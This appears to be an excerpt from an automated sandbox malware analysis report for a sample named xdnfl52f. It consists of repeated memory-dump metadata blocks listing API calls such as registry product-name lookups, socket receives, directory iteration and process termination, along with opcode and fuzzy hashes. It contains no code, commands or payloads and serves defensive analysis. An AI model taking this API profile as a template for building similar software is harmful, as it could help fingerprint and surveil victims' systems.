                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 215268677-0
                                                                                                    • Opcode ID: 1c225c442ed3ae12c114120d81f2afce391d37106ff629cfd40a7a8c2f449ed4
                                                                                                    • Instruction ID: 2aaa834f8488fdfbc1a5b61101c136e1222793811c7475c73ed11ee58058fdc1
                                                                                                    • Opcode Fuzzy Hash: 1c225c442ed3ae12c114120d81f2afce391d37106ff629cfd40a7a8c2f449ed4
                                                                                                    • Instruction Fuzzy Hash: 4D11C932A18B8182F750AF16F45036BB7A1FB88B80F985575EA9D47B68CF7CD405CB50
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                    • String ID:
                                                                                                    • API String ID: 73155330-3916222277
                                                                                                    • Opcode ID: 336825bb6ec552b2255ba205852975222f8075cf9761890abf88a9c0bd67c094
                                                                                                    • Instruction ID: cd5681f7b59af05f4f675dcf34a8c51db1ac170ee77b12063ca159f79070f1d5
                                                                                                    • Opcode Fuzzy Hash: 336825bb6ec552b2255ba205852975222f8075cf9761890abf88a9c0bd67c094
                                                                                                    • Instruction Fuzzy Hash: 06518F32B08B4996EB159F2AD05026CB3A1FB48F90F984672CF5D437A4DF39E461C310
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value
                                                                                                    • String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                    • API String ID: 3702945584-1787575317
                                                                                                    • Opcode ID: ca02e5c3ed8e0fc6be14c1ad152ff79eaac3ff22c286f7938fb5c96ca43ff221
                                                                                                    • Instruction ID: 604c240823e663616b44e627044d7953dcf4714aa60126cab0ae3aaeb87fe68a
                                                                                                    • Opcode Fuzzy Hash: ca02e5c3ed8e0fc6be14c1ad152ff79eaac3ff22c286f7938fb5c96ca43ff221
                                                                                                    • Instruction Fuzzy Hash: 24117F32A08B8182E7209F21F4413AAF3A4FF88B88F944635EA9C03B58DF7CD155CB50
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Cleanupclosesocketrecv
                                                                                                    • String ID:
                                                                                                    • API String ID: 1729841683-0
                                                                                                    • Opcode ID: 153a8f367251099ea56c5ded8da1f9f529a81eefe5b5680142481da0f3f56135
                                                                                                    • Instruction ID: 709d293bc82e1fec2a7c231ddfdb27b0275e2dc5ab60a97cd1902793ce0a3952
                                                                                                    • Opcode Fuzzy Hash: 153a8f367251099ea56c5ded8da1f9f529a81eefe5b5680142481da0f3f56135
                                                                                                    • Instruction Fuzzy Hash: 5991B662E18BC241FA20EB14E4443AEA752EFC9BA0F945771DAAD03AD9DF7CD481C750
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __std_fs_directory_iterator_open
                                                                                                    • String ID:
                                                                                                    • API String ID: 4007087469-0
                                                                                                    • Opcode ID: 11d8d49c8c395776cbcd5edbc15f09aad149487428d3542752543d0f65e9b254
                                                                                                    • Instruction ID: c6696271733edc0a457cd116eb42d6792d1397d4de5fb0d9582d5344519190a1
                                                                                                    • Opcode Fuzzy Hash: 11d8d49c8c395776cbcd5edbc15f09aad149487428d3542752543d0f65e9b254
                                                                                                    • Instruction Fuzzy Hash: 5861B362F14B428DFB10EF65D4807BCA2A2EF48FA8F8846B1DE1D576D5DE3CD4918260
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                    • String ID:
                                                                                                    • API String ID: 3668304517-0
                                                                                                    • Opcode ID: be1b3d1eee05a27b5546cac85815e16f132c2ddf88a860b07e8a1267dfc6dc20
                                                                                                    • Instruction ID: 17d8600a641f118a6f3f9c83cf41ed1b36ea2ac59c808bf47fb174aa422c2b24
                                                                                                    • Opcode Fuzzy Hash: be1b3d1eee05a27b5546cac85815e16f132c2ddf88a860b07e8a1267dfc6dc20
                                                                                                    • Instruction Fuzzy Hash: CB319C73B15A8984FB04EF28D4543BCA396EF44F88F984975DB5D06A9ADF2DC8808354
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FolderFreeKnownPathTask_invalid_parameter_noinfo_noreturn
                                                                                                    • String ID:
                                                                                                    • API String ID: 2444108017-0
                                                                                                    • Opcode ID: 06abcba0fc6b81994d27e6ba2f45d8e2e84e19e9ea726bb327585e49e254f2c7
                                                                                                    • Instruction ID: bcebbcec6d1039e373286eac54783144794f53b9ef0a4be31c176e5401bbdc12
                                                                                                    • Opcode Fuzzy Hash: 06abcba0fc6b81994d27e6ba2f45d8e2e84e19e9ea726bb327585e49e254f2c7
                                                                                                    • Instruction Fuzzy Hash: 39316262E18B8582F7209F25E44026AB761FF98BB4F645735FAAC02695DF7CD1818B40
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3677997916-0
                                                                                                    • Opcode ID: 11475176b76eb57d8b8a12ce903080e854821220ed2306c7bb027ff8b64a26c0
                                                                                                    • Instruction ID: c00e5d4fec9ff8bbdf9a161a1a26f35fba0ed9d12bfc31953386a56f83a258e0
                                                                                                    • Opcode Fuzzy Hash: 11475176b76eb57d8b8a12ce903080e854821220ed2306c7bb027ff8b64a26c0
                                                                                                    • Instruction Fuzzy Hash: EE21E766E1878241FA10AF25E04136AE751FFC9BD4F845231FA8D02A99DE2CD085C710
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Info$User
                                                                                                    • String ID:
                                                                                                    • API String ID: 2017065092-0
                                                                                                    • Opcode ID: 877c1b4e073b3a87c3d7ac6068cbd316133fc0437c9f32c249d117db553f0db1
                                                                                                    • Instruction ID: 87a8a88a428363fc850a283405ad0f8206e9c7a8a7aefce8699a3897222c525e
                                                                                                    • Opcode Fuzzy Hash: 877c1b4e073b3a87c3d7ac6068cbd316133fc0437c9f32c249d117db553f0db1
                                                                                                    • Instruction Fuzzy Hash: 81119072A1878682E710AF61E45075EB3A2FB84FC8F485135EB8907B59DF7CD890CB44
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: 38c7b4f83e553420579c8e330882a64258dcf8d372290847a19fb81a50e45df1
                                                                                                    • Instruction ID: da819c8fead1fc24d4e8c7cb478de4fe6417d590018ff120b9bff03888181e10
                                                                                                    • Opcode Fuzzy Hash: 38c7b4f83e553420579c8e330882a64258dcf8d372290847a19fb81a50e45df1
                                                                                                    • Instruction Fuzzy Hash: 3DD09254F0870256FB187FB05C9507C93A96F9D701FCC1CB8DA0B16393CE6DAC4942A0
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProfile
                                                                                                    • String ID: Unknown
                                                                                                    • API String ID: 2104809126-1654365787
                                                                                                    • Opcode ID: 22e8dba5ae4e86c0326f8be6cf605145216d5eee1111140a83b2067be56ce9ba
                                                                                                    • Instruction ID: 06ba031b6419fde0dfc7c76df1ea94d77d7a03969361cc16e7c66cf55958d91e
                                                                                                    • Opcode Fuzzy Hash: 22e8dba5ae4e86c0326f8be6cf605145216d5eee1111140a83b2067be56ce9ba
                                                                                                    • Instruction Fuzzy Hash: 2931D223A2CBC186F710DF20E5402AAA760FB99B44F985235FBCD02A5ADF7CD595CB00
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 32fdcffeaa9b8b5634eb95ab0214ec6b56e2fe01cf18ab8b5099a1124b5cac1a
                                                                                                    • Instruction ID: 7a518387e9bae1b98a7974f4c3eb489c72b8eb56e4da5310695903002021b8ee
                                                                                                    • Opcode Fuzzy Hash: 32fdcffeaa9b8b5634eb95ab0214ec6b56e2fe01cf18ab8b5099a1124b5cac1a
                                                                                                    • Instruction Fuzzy Hash: 2CA1AB33A18B8186FB109F25D8903ADB7A1FB89B98F588635DA4D47799DF3CC481C750
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                    • String ID:
                                                                                                    • API String ID: 73155330-0
                                                                                                    • Opcode ID: aabccf3ff13c909e80753b9aa107600329d117564317721f048c6460200f7d1b
                                                                                                    • Instruction ID: c73403dba03c41fbf72813fc5ddac6e2e0c3b5ad696764ac3d73542296c2686c
                                                                                                    • Opcode Fuzzy Hash: aabccf3ff13c909e80753b9aa107600329d117564317721f048c6460200f7d1b
                                                                                                    • Instruction Fuzzy Hash: C861AC26B08A8384FA14AE55D15427DA3A2EF04FD8F9885B1CE1D073D9DF3DE846C360
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$CloseOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3087652857-0
                                                                                                    • Opcode ID: 7e2a306bad7545b8412e06f2262b04ca10cda178427cb0c5941f5154108ad285
                                                                                                    • Instruction ID: 6a54c4bef2f79c715e3f48c7efd3be4eaca0a3ec77d2ffedc4c466b333e11bb4
                                                                                                    • Opcode Fuzzy Hash: 7e2a306bad7545b8412e06f2262b04ca10cda178427cb0c5941f5154108ad285
                                                                                                    • Instruction Fuzzy Hash: 4671C272A18B8185FB10DF64E4403AEB7A2FB98B94F945275EA9C07B99DF3CD140C710
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                    • String ID:
                                                                                                    • API String ID: 73155330-0
                                                                                                    • Opcode ID: 527dd8a8b359668ff5b98347e1c738495a268219d0c5a4c899adc3e1e91da265
                                                                                                    • Instruction ID: 07ebb00604167ff3c6f2ca7cb1fa157921875be5ef612f92e7f45a253c45f48b
                                                                                                    • Opcode Fuzzy Hash: 527dd8a8b359668ff5b98347e1c738495a268219d0c5a4c899adc3e1e91da265
                                                                                                    • Instruction Fuzzy Hash: E5419E62B08B8985FA10AF12A5042ADA756FF49FD4F980A75EF6D0B786DE3CD4418350
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                    • String ID:
                                                                                                    • API String ID: 73155330-0
                                                                                                    • Opcode ID: 41366f48fda8fa6371309c4c2793b83d94621a1ad52d767e4b96f46f6433f0b0
                                                                                                    • Instruction ID: 21a53b1f963a05ceea943c3a271af9cc6752179a941d445cee0854e4a802ef2f
                                                                                                    • Opcode Fuzzy Hash: 41366f48fda8fa6371309c4c2793b83d94621a1ad52d767e4b96f46f6433f0b0
                                                                                                    • Instruction Fuzzy Hash: 3241DE26718B8585EA14EF25F1541BEE3A2EF58FD4F988636EAAD03B84DF3CD0408310
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                    • String ID:
                                                                                                    • API String ID: 73155330-0
                                                                                                    • Opcode ID: 84176b02f3a573c842ae7b58a793090013bb79ab3e21cbb6e5bb6528e824915f
                                                                                                    • Instruction ID: fd1ab65e35f09e0953a89b7f88ca12bd8faab1642062d2aebda50b88e93f8a8c
                                                                                                    • Opcode Fuzzy Hash: 84176b02f3a573c842ae7b58a793090013bb79ab3e21cbb6e5bb6528e824915f
